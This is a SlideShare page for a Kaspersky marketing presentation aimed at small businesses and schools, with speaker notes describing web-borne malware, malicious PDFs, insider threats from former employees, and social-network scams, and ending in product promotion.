Real Business Threats!


Published on

It’s not news that threats are growing across the IT security landscape. Today’s malware imposes significant business risks due to the highly organized nature of attacks – applications, web sites, and social networks are all subject to attacks and vulnerabilities. Hackers are highly organized professionals with vast networks who are able to precisely target an unsuspecting victim, including many small businesses and their employees. Users may not even realize his/her machine has been compromised for days, weeks, or even months due to the nature of these attacks. During this talk, Mark Villinski will examine what this means for business owners and what IT managers need to look for to stay on top of these threats.

Mark Villinski, Kaspersky

Mark Villinski brings more than 12 years of technology sales and marketing experience to Kaspersky. Mark leads Field Marketing efforts for the East Coast and is responsible for increasing awareness and demand for Kaspersky’s Open Space Security Produce Line. Prior to joining Kaspersky, Mark served as Director of Worldwide Channel Operations for Enterasys Networks, where he was responsible for the strategy and day-to- day operation of the Secure Advantage Partner Program. Prior to that role he held a number of channel and field marketing roles at Enterasys and Cabletron Systems. He started his high tech career in sales at Cabletron Systems.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide
  • According to, The Top Cyber Security Risks, the number of attacks is now so large and the criminals sophistication is so great that many organizations are having trouble determining which new threats and vulnerabilities pose the greatest risk and how resources should be allocated to ensure that the most probable and damaging attacks are dealt with first.Biggest problem in cyber security is being overwhelmed with all you need to focus on in cybersecurity. In this presentation we’ll zero in on the threats and practical ways to protect your business from this risk. Today we’ll discuss how to protect against cyberthreats that matter to your business. The focus of this presentation is on small businesses with a small IT group but these threats are no respecter of size. As an introduction to the facts and figures we’ll discuss in this presentation, let’s watch this short video that illustrates the exponential growth in Internet threats.
  • According to the “State of the Internet” report delivered by Websense, there has been a 233% increase in malicious web sites in the last 6 months. That is on top of a 671% increase in 2008. The WEB is truly under siege.In today’s presentation we’ll discuss Good sites that have gone bad, how this happens, and how to protect yourself from those sites.Next, we’ll discuss the forgotten security risk – the recently departed employee, perhaps a disgruntled employee. Finally, we’ll discuss Web 2.0, the new sharing, trusting, world that is increasing risks for employees and employers.
  • Regulatory compliance and IT Security are not always synonymous. You can easily be compliant with a regulatory body yet be very insecure. Many organizations look at malware protection as a check-box – “I have to have it and I have to maintain it, but that’s all I have to do!”The key point to understand about regulatory compliance is that it often involves a "top down" approach. There is typically a cookie-cutter template that defines the initiative, and you must look at your products and processes and try to figure out how they can mesh with the oddly shaped template handed down to you. Security, on the other hand, is a bottom-up initiative—when done correctly. Whether you are designing a software product or the architecture for your organization's new network, the key concept to remember is measure twice, cut once. When you are designing product architecture, for example, just as a good initial pass would describe communication, localization, versions, and so forth, so should it describe the security elements that need to be built into the application from day one (and which you should continue to investigate and refine throughout development).Compliance may provide an illusion of security to those that don’t understand the complexities of securing the digital business world, but it shouldn’t be the end goal.BackgroundThe Children’s Internet Protection Act (CIPA) is a federal law enacted by Congress to address concerns about access to offensive content over the Internet on school and library computers. CIPA imposes certain types of requirements on any school or library that receives funding for Internet access or internal connections from the E-rate program – a program that makes certain communications technology more affordable for eligible schools and libraries. In early 2001, the FCC issued rules implementing CIPA.What CIPA Requires Schools and libraries subject to CIPA may not receive the discounts offered by the E-rate program unless they certify that they have an Internet safety policy that includes technology protection measures. The protection measures must block or filter Internet access to pictures that are: (a) obscene, (b) child pornography, or (c) harmful to minors (for computers that are accessed by minors). Before adopting this Internet safety policy, schools and libraries must provide reasonable notice and hold at least one public hearing or meeting to address the proposal.Schools subject to CIPA are required to adopt and enforce a policy to monitor online activities of minors.Schools and libraries subject to CIPA are required to adopt and implement an Internet safety policy addressing: (a) access by minors to inappropriate matter on the Internet; (b) the safety and security of minors when using electronic mail, chat rooms, and other forms of direct electronic communications; (c) unauthorized access, including so-called “hacking,” and other unlawful activities by minors online; (d) unauthorized disclosure, use, and dissemination of personal information regarding minors; and (e) measures restricting minors’ access to materials harmful to them.Schools and libraries are required to certify that they have their safety policies and technology in place before receiving E-rate funding. CIPA does not affect E-rate funding for schools and libraries receiving discounts only for telecommunications, such as telephone service. An authorized person may disable the blocking or filtering measure during any use by an adult to enable access for bona fide research or other lawful purposes. CIPA does not require the tracking of Internet use by minors or adults.
  • How are cybercriminals attacking the desktop today? They’re doing so by malware specifically designed to steal money and data and give cybercriminals control of systems inside the corporate network.CLICK 1: Writing malware for bragging rights is dead. Nowadays cyber criminals chase the money and have a lot of it to invest in developing new areas of attack (Bo Olsen, Malware Researcher). Attackers today are cyber-criminals looking to make money off of your data. Attackers no longer target the OS. They are after applications that contain data that can be used to make money! Threats come from many vectors: physical vectors (floppy disk, USB drives, CD’s), Email vectors (spam, web redirection, phishing), Web vectors (drive-by downloads, malicious sites, liability). And they are targeting WEB sites as the weakest links.The primary web vulnerabilities, SQL Injections and Cross-site Scripting (XSS) make up 80% of the exploited vulnerabilities. Because of these, your web site could be launching malware, serving malicious content to vulnerable client side applications. If it’s poorly configured to keep hackers out, hackers will plant malicious code that proliferates malware to unsuspecting surfers. Not only will your users be hurt but Google will see it and block your website until you clean it, resulting in damage to your business. Vulnerable databases that hold user data can also be hacked. Software that creates a website, like Drupal, WordPress (the most insecure), and others. Your website is vulnerable because of these platforms. Must keep systems updated and patched.CLICK 2: Obfuscated (hidden, obscure)Javascript, hidden in a legitimate website, redirects users connections to another server (in Astonia, Russia). This happens in background without your knowledge. You are fingerprinted, shows apps, OS, patch levels, etc., and an exploit is triggered to target a found vulnerability. CLICK 3: A backdoor trojan is loaded which gives the hacker access to put other things on your system, i.e., banker Trojans (programed with list of 100 banks – when you go to your bank the Trojan kicks in because it’s on the list and it captures your info and uploads it to a remote server.)This is the work of CYBERCRIMINALS
  • CLICK 1: In this ComputerWorld article, financial institutions have become the target of attacks. Cybercriminals are attacking small banks and businesses using stolen passwords and account data to empty corporate accounts. This is happening because small and mid-sized business often lag behind in security spend, especially at the endpoint.800 computes had data destroyed in Norfolk, VA$40 million in losses in 2009 for small businessesUnited Shoreline Insurance lost $150K to one virusHilary Machinery lost $801,495 to cybercrimeThink it can’t happen to you? Think again.CLICK 2: This article from The Washington Post highlights the fact that public schools and universities have become targets as well, for much the same reasons.Case in point: Sanford School District, Colorado: Lost $117,000 in a series of transfers just below $10K, below the banks radar. They recouped only $18K. Sand Springs School District, Oklahoma: lost approximately $150K in two fraudulent transfers. Marian University, Wisconsin: lost $189K in bogus transfers to money mules. They recovered $54K only.Money mules are people who sign up to “work at home” as “Financial Agents.” They are effectively money launderers without their knowledge. The Focus Group Inc. company, a Russian scam, is set up as a front for a money laundering for stolen money. School District in ILLINOIS: also been hit but the losses have not been disclosed as it is still an ongoing investigation.And the list of examples goes on because schools are seen as easy targets.
  • CLICK 1: Drive-by downloads deliver malware without your knowledge. They target client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office applications. Sometimes you don’t even have to click to open anything – you get infected just by visiting the web site.CLICK 2: Dirty Web Sites (Sex, Adult Content, Gambling, Drugs, etc.) is getting dirtier – 69% have at least one malicious link. But it’s not the dirty web sites that have the greatest risk. 77% of legitimate sites today have been compromised.CLICK 3: You can buy exploit code with a credit card on the Internet, making exploit code readily available, with support as well. And, if you’re really lazy . . .Click 4: You can buy a manged service that will provide to you the infrastructure and labor to rollout your malware.CLICK 5: Patching is still the biggest problems with companies today. PSI (personal software inspector) – a vuln scanner that returns unpatched apps, found that only 2% off all machines scanned are fully patched. Client-side applications are the target of these web vulnerabilities and must be patched.ActiveX allows IE to talk to 3rd party apps. Many vulnerabilities – hard to find and hard to fix – regedits required. Most computers have an ActiveX vuln and hackers are targeting them from malicious code on legitimate web sites. Applications that are being targeted because of Vulns – these are on 99% of PC’s in the wild. Browser vulns are being targeted – must be patched. The plugins are full of vulns and must be patched as well. Kinda like being on a treadmill – always running but not getting anywhere.
  • CLICK 1: According to Microsoft Security Intelligence Report (v7), -Almost any software contains vulnerabilities which can be exploited to deliver/ distribute malicious code-Browser and OS vulnerabilities are the most dangerous, but those attacks have gone down-Largest number of known vulnerabilities are in third-party applications – this figure is higher because of the sheer amount of software availableCLICK 2: As you can see from this chart, Adobe still tops the charts in actual attacks, though Adobe has been doing better about patching their software.Audience PollDo you know what version of Adobe flash is running on every desktop? If so how do you know? How do you patch for every version?
  • CLICK 1: This is a Malicious PDF attachment. When you open it you see garbage, but in the background...CLICK 2: Obfuscated javascript is hidden inside the file. After it’s decompressed and deobfuscated it with some special tools it looks like this.CLICK 3: Hidden in this javascript is shellcode that runs silently when the PDF is opened. Shellcode is machine level code that speaks directly to the hardware.This PDF contained upwards of 5 separate PDF vulnerabilities that can do anything from password stealing to remote code execution. If you look at the bottom of javascript example there is a section where it actually says "collectEmailInfo" which is just one of the previously known Adobe vulnerabilities which can be used as part of a buffer overflow, allowing the launch of any exe on your system. This happens silently without any authorization.You can get this PDF as an email attachment, or as a drive by download from the web (a specially crafted web page auto launches the PDF just by opening the site and then infects you.)
  • The one bastion of security in the school system has been the MAC – until now. CLICK 1: More and more attacks are being seen against MAC’sCLICK 2: One reason for this is the increasing market share for MAC. MAC now has over 10% of the market, making it a viable target.CLICK 3: Because more people are using them, it’s worth the time of the cybercriminal to attack these devices CLICK 4: The rise in attacks as caused many AV vendors to produce AV products for the MAC, including KAPSERSKY!!CLICK 5: Here’s one example: this site offers an HDTV program for MAC. You think you are getting MacCinema. What is downloaded is a trojan.
  • Here are examples of legitimate sites that have been compromised by cybercriminals:CLICK 1– infected with flash ads. Flash ads served malware. High profile, high value web site.CLICK 2– CBS had redirect to russian web-site. High profile. Not mom&pop. An IFrame (which isn't another Apple product - it stands for "inline frame") is just a way of loading one web page inside another, usually from a different server. That can be useful for building online applications. But malware writers can make the included page just one pixel square - meaning you can't even see it's there - and obfuscate the JavaScript that will run automatically from that included page so that it looks something like %6C%20%66%72%61%6D%65%62%6F - leaving no obvious clue that it's malicious.CLICK 3 - Miami dolphins site hacked during superbowl. Anyone who visited was getting malware delivered to them. Tried to exploit known Microsoft vulnerabilities.CLICK 4– Business Week hacked, story was a year old, and Business week had cleaned their site, but did not find the hole in this article. Hackers were using this to serve malware and redirect traffic in the background. Pulling exploits from Russia through Business Week.CLICK 5 – site where google will tell you if you’ve hosted malware. Blogspot is owned by google. As you can see they were also hacked and serving up nasty stuff.It is vital to have your web sites locked down and protected but also have your employees protected while surfing the web.
  • Password policies, while maybe not this stringent, are very necessary – not just for current employees but for departing employees as well.
  • While the number of compromised websites rose 44% in 2008, only 57% of all espionage/data theft comes from the Internet. That leaves room for other attack vectors. A huge threat to organizations today is the ex-employee, sometimes disgruntled, sometimes going to a competitor. These employees create hidden accounts prior to their departure.CLICK 1: sysadmin fired but kept access to mutual fund company and blackmailed them CLICK 2: ex-employee took files off and took them to his new employer – competitive data loss – a real case in process nowCLICK 3: Survey on how many x-employees steal when they are leaving – 60% of exiting employees steal company data!! How much are you losing? Many companies right now are downsizing and laying off employees. How much corporate data is walking through the door?
  • CLICK 1: What makes him an insider on the outside.No policy to disable accounts and passwords. Where did they have access? Is there a checklist?Rules/policy for the return of company equipment. He still has all the data on the laptop/smart phone.Shared password and multi-user accounts. This can be exploited if one person leaves and the password is not changed. Should have policy against shared passwords but many don’t.CLICK 2: How do you protect your company from these ex-employees?Map out where the data is and who has access to it. You need to know where and who can access any data.You need to log who is accessing that data so you know who is going where.You can then spot unusual traffic and investigate. You can then change access for people that don’t need it.Make sure you have a policy to deal with x-employees.
  • 850 executives – c level, across all industries.Read the statistics from each bulletLast point – an existing employee may know what the passwords were for an x-employee and use that to steal data and pin it on the ex-employee.
  • Ashton Kutcher said “the social web is a giant ego stream of a generation being filtered through a black market in an effort to monetize the individual.” Ashton is correct. We are a number – a green one to cybercriminals.The Internet is a money-making machine. Unfortunately, the one’s making the money are the criminals, bilking millions out of individuals and corporations. Let’s look at another way cybercriminals are stealing money.
  • CLICK 1: How are cybercriminals invading organizations today? Through a wide open port in the perimeter security that allows users to access the web for their daily tasks. Employees are shopping, doing online gaming, sharing personal information on dating sites, and exploring the WEB 2.0 world – Facebook, YouTube, MySpace, etc.Companies and employees are heavily involved in social media today. Hundreds of companies doing social media – sharing, talking, listening – but also propagating malware and crimeware.Social media is a breeding ground for crimeware!! The Web is truly under siege by Cybercriminals today and it is, in many organizations, unblocked to the desktop.CLICK 2: The big ones are on the right – everyone has a facebookacocunt, reaching out and sharing, hugging virtually, etc. 450K people are on facebook, 50% of those every day. And many are doing facebook from their office desks, opening the company to a serious risk. The endpoint must have adequate protection from web-borne cyber attacks as it is the new target for cybercriminals today.Facebook gives people the power to share and makes the world more open and connectedMillions of people use Facebook every day to keep up with friends, upload an unlimited number of photos, share links and videos, and learn more about the people they meetIt’s a trusted environment, you’re only connected to the people you “approve” as your friendIt’s freaking awesome According to Salaries.Com (2005) employees wasted 2.09 hours per day, the internet being the area where the most time was wasted, resulting in $759 billion in lost salaries throughout a year. 48% of that time was on the Internet!126 million blogs27.3 million tweets per day475 million Facebook users, 50% on online every day12.2 Billion videos downloaded every month2.5 billion photos uploaded to Facebook every month
  • CLICK 1: This is the facebook site of Ryan Narriane, Kaspersky’s Security Evangelist and Chief Editor of Threatpost.SECOND CLICK: Ryan uses his facebook to blog about security exploits.THIRD CLICK: Example of someone sharing a link. It is contracted by google and you never see exactly where you are going. You have no idea if this link is malicious or not, but because it’s from a “trusted friend”, you click on it.
  • Here’s an example of how clicking on a link can be disastrous:CLICK ONE: Koobface. A network worm running on Windows systems. There are 60 new variants today since july 2008.CLICK TWO: Originally found on facebook but now it’s occuring on twitter and myspace. Exploits this trusted site kind of thing.CLICK THREE: Here’s what it looks like. Notice the redirector says google to add more trust. CLICK FOUR: You click on the link and it looks like Utube. Then it tells you that you need to update your flashplayer. If you run it, you get the malware. When you get it, you then start sending the same message to all of your friends and family. Makes you very popular!!
  • The friendly 419 scam:The notorious 419 scams have sadly become ubiquitous on the Internet. While they began as e-mail cons, usually involving promises of a vast fortune from a Nigerian prince, they have morphed into a new and more sophisticated ploy that involves hijacking the Facebook account of a friend in order to fool kind souls into thinking they're helping a pal. Thieves use an account to garner sympathy as they claim to be in desperate need of cash, often because they've been robbed or detained while traveling abroad. One duped Missouri woman wound up handing over $4,000 before she realized she'd been had.2) Hidden fee apps:There are plenty of Facebook apps and quizzes with questionable motives and privacy policies, but there are some that are outright scams. Take, for instance, the sad tale of Leanne Saylor, who fell prey to scammers after taking a simple IQ quiz on the service. To receive her results, she was required to submit her cell phone number and wait for a text. When she didn't receive anything, Saylor entered her phone number two more times. When she opened her next cell phone bill, she discovered three charges from the app, totaling a whopping $44. AT&T blocked future fees, but Saylor learned the hard way that she should never give out her cell phone number to strangers, much less strange apps.3) Fake login pages:A particularly sneaky method of ensnaring Facebookers lies in the loads of phishingmessages that lead to convincing-but-fake versions of the Facebook login page. Typically, these spam e-mails are brief and contain a link, usually ending in ".im" or ".at." (We received one that simply read, "Look at") Once you enter your e-mail and password to 'log in,' it's game over; a hacker has control of your account and will quickly use it to perpetrate any one of the scams listed here. What's worse, they'll impersonate you to spread phishing e-mails to all of your friends.4) Malware links:Once an account is hijacked, it can be used to deluge that account holder's friends with messages containing links to malicious sites. It's rough stuff. These poisonous software packages leave you vulnerable to the theft of even more data, including all the passwords, account numbers and credit card information you may have entered into your PC. Recently, a barrage of spam messages featuring a link to "CoooooL Video" actually led to nothing but a nasty malware infection.5) Facebook apps that are malware:Creating Facebook applications has become so easy that hackers have created apps with the sole aim of tricking you into handing over your personal data or Facebook password. Some versions impersonate one of the standard Facebook features, like "Your Photos" and "Friend's Gifts," and send convincing notifications, like "someone has commented on your photo," or so-and-so "has posted on your wall." But clicking on them either leads to a fake login page, or a window asking for permission to access your Facebook account. These scams are particularly tough to spot because they mimic actual Facebook notifications. The only way to protect yourself is to look for tiny inconsistencies in the false apps (e.g., odd or incorrect icons, clunky wording and poor English usage). It seems your teacher wasn't lying after all when she said learning grammar was important.Reset Password ScamAddress of sender is spoofed to display “support@facebook.comTricks users into downloading a dangerous piece of malwareDownloads additional malicious files and joins the BredolabbotnetGives attacker control of your PC
  • Digg a newswebsite, like threatpost. 1000’s of people post stories to Digg. If you click on a story you vote it to the top of the site. This story was getting a great deal of hits. Shows how many people clicked on the story. Anyone can comment on the story. One person put a link in his comment. You click on the link and you get malware!
  • It’s happening every day. Here are examples:CLICK ONE: new facebook worm spreadingCLICK TWO: Quicktime worm spreading in MySpaceCLICK THREE: Malware being spread via bad twitter profiles. My twitter account has been targeted by bad users as well.CLICK FOUR: Online gaming passwords being stolen by worms, Taterf and Frethog.CLICK FIVE: Twitter hacks on high-profile users. (don’t put anything in writing you don’t want the whole world to know.)CLICK SIX: Google exec in austrialia. Was I’ming in facebook. With a friend. “stranded in austrailia – need help. “ The nigerians are getting facebooks accounts, logging in as them, trying to get people to send them money. Assuming identity of facebook profile. Bilking money from other people. They know everything about you from your facebook account!!
  • So enough of the bad stuff. Here’s how to prevent it from happening to you.Patch! You need to stop it before you get infected. Identify the apps that are the most often attacked and make those the priority. Go to the link above to get this information.If it doesn’t patch itself, don’t use it. Firefox does.Keep your web server patched to keep it from serving up malware.Use more than one browser. This limits exposure. Distrust – it’s not her and it’s not hot. It’s malware.2nd bullet: turn off services or block urls that are not necessary for businesses. If they don’t need it at work, don’t give them access to it.Last bullet: you must have premium protection – like that of Kaspersky. Make sure your AV is updating often so you get the latest protection.
  • Update FrequencyAn AV solution is only as good as it’s last update. With 3500+ signatures being created a day, it is critical that updates are timely and do not impact the performance of the system.Kaspersky updates more than anyone in the industry, 664 times per month, almost one per hour, making sure that our customers have the latest in protection while minimizing the impact of updates on system performance.
  • Response Time RankingAccording to Kaspersky responses faster to new threats than anyone in the industry, dramatically reducing the window of vulnerability for our customers.
  • Kaspersky received the Advanced+ rating from AV Comparatives for both detection and removal of malware, both equally important.In the latest VB100 testing Kapsersky received on of the highest RAP scores, Reactive and Proactive Detection, indicating Kaspersky strong malware detection capabilities. The graph above depicts how we stack up against the competition.In the November 2009 test of antivirus software, performed by Anti-Malware Test Lab ( across 19 different vendors, Kaspersky was awarded the GOLD Zero-day Protection Award. Kaspersky did much better than the competitors tested. Kaspersky is the only vendor that took GOLD in all 10 categories tested.
  • [5. SUPPORT]Kaspersky has world-class support for the Americas based in Boston, MA – not off shore. We support multiple languages and ensure that our customers speak to a knowledgeable engineer right away to solve their problems. Our hold times are less than 5 minutes, something that is unheard of in this industry. And, our standard phone support, 8 AM to 9 PM EST, is FREE!!
  • As you can see, Kaspersky truly does offer PREMIUM protection where your business happens. For us, premium means –Recognition from industry leaders like Microsoft, Juniper and Checkpoint validates the quality of our technology.Independent testing labs have year after year continually ranked Kaspersky at the top when it comes to detection and preventionWe have consistently delivered the most immediate protection available, responding rapidly to minimize the window of vulnerabilityOur very small footprint, small updates and impressive scanning speeds means the best protection doesn’t have to impact your productivityDeploying and managing Kaspersky is intuitive and easy to do, yet comprehensive. And we are 100% dedicated to making our customers - lifetime customers, with the care and support you require. Kaspersky is the complete end-to-end anti-malware solution that delivers premium protection and excellent support to keep your business secure wherever it happens.You can trust Kaspersky Lab.
  • Real Business Threats!

    1. 1. 1/30/2015 Copyright 2010. All Rights Reserved.2
    2. 2. • Good sites gone bad o Web under siege (designer malware, drive-by downloads) o The un-patched Windows ecosystem o Legitimate sites launching attacks • Revenge of the recently departed o The insider on the outside o Managing orphaned accounts • Friend or fraud o The good/bad of Web 2.0 o Exploiting trust on social networks o Recommendations
    3. 3. The World of “Check Boxes”
    4. 4. The Growing Malware Threat 3,200,000 2,800,000 2,400,000 2,000,000 1,600,000 1,200,000 800,000 400,000 0 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 30,000 3,500+ 1,115 3,312,682 New threats per day New signatures per day Mobile Malware Signatures as of December 2009 Total as of December 2009 1/30/20155 Copyright 2010. All Rights Reserved.
    5. 5. • Professionally targeted to weakest links ―Poorly configured Web servers ―Vulnerable publishing platforms ―Un-patched Internet-facing databases • Obfuscated JavaScript code inserted on hacked Web pages ―Redirects to remote server hosting exploits ―Serves custom malware based on Windows OS version, browser version, patch level, vulnerable third party apps ―Fires exploits simultaneously at IE, WinZip, Java, QuickTime, ActiveX controls, even Firefox … until exploit hits target • Payload: Backdoor Trojans, password stealers, banker Trojans, spam bots ―This is the work of highly skilled, well-organized cyber criminals
    6. 6. • Hacked Web sites deliver drive-by downloads ―It’s no longer just “dirty” Web sites ―77 percent of Web sites with malicious code are legitimate sites that have been compromised • Vulnerabilities/exploits are ready-made, publicly available • The (un-patched) state of Windows ―Secunia PSI statistics: Only 2% of Windows computers fully patched ―ActiveX control vulnerabilities hard to find, fix ―The Adobe Acrobat/PDF, Flash, RealPlayer, WinZip and QuickTime monocultures ―Browser flaws everywhere: IE, Firefox, Safari, Opera ―Browser plug-ins: A bigger nightmare
    7. 7. Client Side Application Vulnerability
    8. 8. • Mac users now make up 10% of the marketplace • They are now more attractive to cybercriminals – worth the trouble due to the numbers • Major AV Vendors have or are releasing AV products for the Mac • An Example – MacCinema: Popularity Makes MAC a Growing Target
    9. 9. • Insider on the outside o Failure to disable passwords and accounts o Relaxed rules for the return of company equipment o Exploiting shared passwords in multiple-user accounts • Questions to ponder around orphaned accounts o Where’s the data? Who has access to it? o Are you logging all access to that data? o Can you spot unusual data traffic? o Does your password policy cover ex-employees?
    10. 10. • Symark international surveyed 850 security, IT, HR and C-level executives across all industries. Here’s what they found: o 42% of businesses do not know how many orphaned accounts exist within their organization o 30% have no procedure in place to locate orphaned accounts o 27% said that more than 20 orphaned accounts currently exist within their organization o More than 30% said it takes longer than three days to terminate an account after an employee or contractor leaves the company, while 12 percent said it takes longer than one month o 38% said that they had no way of determining whether a current or former employee used an orphaned account to access information
    11. 11. The Endpoint is the New Perimeter
    12. 12. • Net-Worm.Win32.Koobface o Created in July 2008 o Variants still squirming in 2009 • Net-worm that exploits trust on Facebook and Myspace
    13. 13. • The Friendly 419 Scan • Hidden Fee Apps • Fake Login Pages • Malware Links • Facebook Apps that are Malware • Reset Password Email Multiple Attack Vectors
    14. 14. • Be proactive about security: ―Patch! Patch! Patch! ―Identify commonly exploited third-party apps ( and keep those updated as a priority. Stay away from programs without auto-update mechanisms ―Your web site can be an exploit site! Stay on top of high- priority patches for Web servers and all components • Shut off all unnecessary network services and block employees/students from social networks ―Hackers prey on the "trusted" nature of these networks to trick users into installing malware on endpoints. If certain employees don't need Internet access, don't provide it • Implement strong malware protection throughout your organization!!
    15. 15. Endpoints, Mail Servers, Internet Gateways
    16. 16. Small Updates for the Best Protection and User Experience Microsoft Symantec Trend Micro CA McAfee Updates per Month 0 100 200 300 400 500 600 700 24 28 32 33 138 1/30/201526 Copyright 2010. All Rights Reserved.
    17. 17. Eset Sophos AVG Symantec McAfee Hours 0 2 4 6 8 4 to 8 hours 4 to 6 hours 4 to 6 hours 2 to 4 hours 2 to 4 hours < 2 hours 1/30/201527 Copyright 2010. All Rights Reserved.
    18. 18. Short Hold Times Proactive Dedicated Engineers High-touch Free Standard Support Multiple Languages 1/30/201529 Copyright 2010. All Rights Reserved.
    19. 19. Premium Protection Where Your Business Happens Trusted by the Leaders in the Industry Top-Rated Malware Detection Rates Fastest to Respond to New Threats Built for the Best Possible User Experience Intuitive & Easy to Deploy and Manage World-Class Quality Support 1/30/201530 Copyright 2010. All Rights Reserved.
    20. 20. 1/30/201531 Copyright 2010. All Rights Reserved.